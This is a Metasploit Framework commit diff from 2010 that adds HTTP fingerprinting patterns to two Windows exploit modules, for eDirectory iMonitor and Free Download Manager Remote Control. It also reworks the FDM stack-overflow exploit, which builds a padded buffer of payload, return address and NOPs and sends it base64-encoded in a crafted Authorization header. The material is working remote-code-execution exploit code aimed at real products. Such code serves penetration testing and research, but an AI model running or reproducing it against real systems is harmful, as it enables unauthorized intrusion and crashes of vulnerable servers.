add more http fingerprints

git-svn-id: file:///home/svn/framework3/trunk@9812 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-13 22:11:40 +00:00 · 2010-07-13 22:11:40 +00:00 · 6d23204c6f
parent e765553d26
commit 6d23204c6f
2 changed files with 17 additions and 4 deletions
--- a/modules/exploits/windows/http/edirectory_imonitor.rb
+++ b/modules/exploits/windows/http/edirectory_imonitor.rb
@ -14,6 +14,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

+	HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port
+
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
@ -23,6 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module exploits a stack buffer overflow in eDirectory 8.7.3
 				iMonitor service. This vulnerability was discovered by Peter
 				Winter-Smith of NGSSoftware.
+
+				NOTE: repeated exploitation attempts may cause eDirectory to crash. It does
+				not restart automatically in a default installation.
 			},
 			'Author'         => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ],
 			'License'        => BSD_LICENSE,
--- a/modules/exploits/windows/http/fdm_auth_header.rb
+++ b/modules/exploits/windows/http/fdm_auth_header.rb
@ -14,6 +14,13 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

+	# w/auth required: [*] x.x.x.x  ( 401-Basic realm="FDM Remote control server" )
+	# w/o auth: <title>FDM remote control server</title>
+	# w/o auth: <div align="right"><span class="style1"><span class="style4">Free Download Manager remote control server.</span><br />
+	# <span class="style4">Version 1.0.</span>  </span></div>
+	# Extra url: /compdlds.req
+	HttpFingerprint = { :pattern => [ /(FDM Remote control server|Free Download Manager)/i ] } # XXX: A custom body check would be nice too
+
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
@ -22,8 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module exploits a stack buffer overflow in Free Download Manager
 				Remote Control 2.5 Build 758. When sending a specially crafted
-				Authorization header, an attacker may be able to execute
-				arbitrary code.
+				Authorization header, an attacker may be able to execute arbitrary code.
 			},
 			'Author'         => [ 'MC' ],
 			'License'        => MSF_LICENSE,
@ -57,11 +63,13 @@ class Metasploit3 < Msf::Exploit::Remote

 		sploit =  rand_text_alpha_upper(1012 - payload.encoded.length) + payload.encoded
 		sploit << [target.ret].pack('V') + make_nops(4) + [0xe8, -575].pack('CV')
+		sploit = Rex::Text.encode_base64(sploit)

 		print_status("Trying target #{target.name}...")

-		send_request_raw({
-			'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(sploit)}" }
+		send_request_raw(
+			{
+				'headers' => { 'Authorization' => "Basic #{sploit}" }
 			}, 2)

 		handler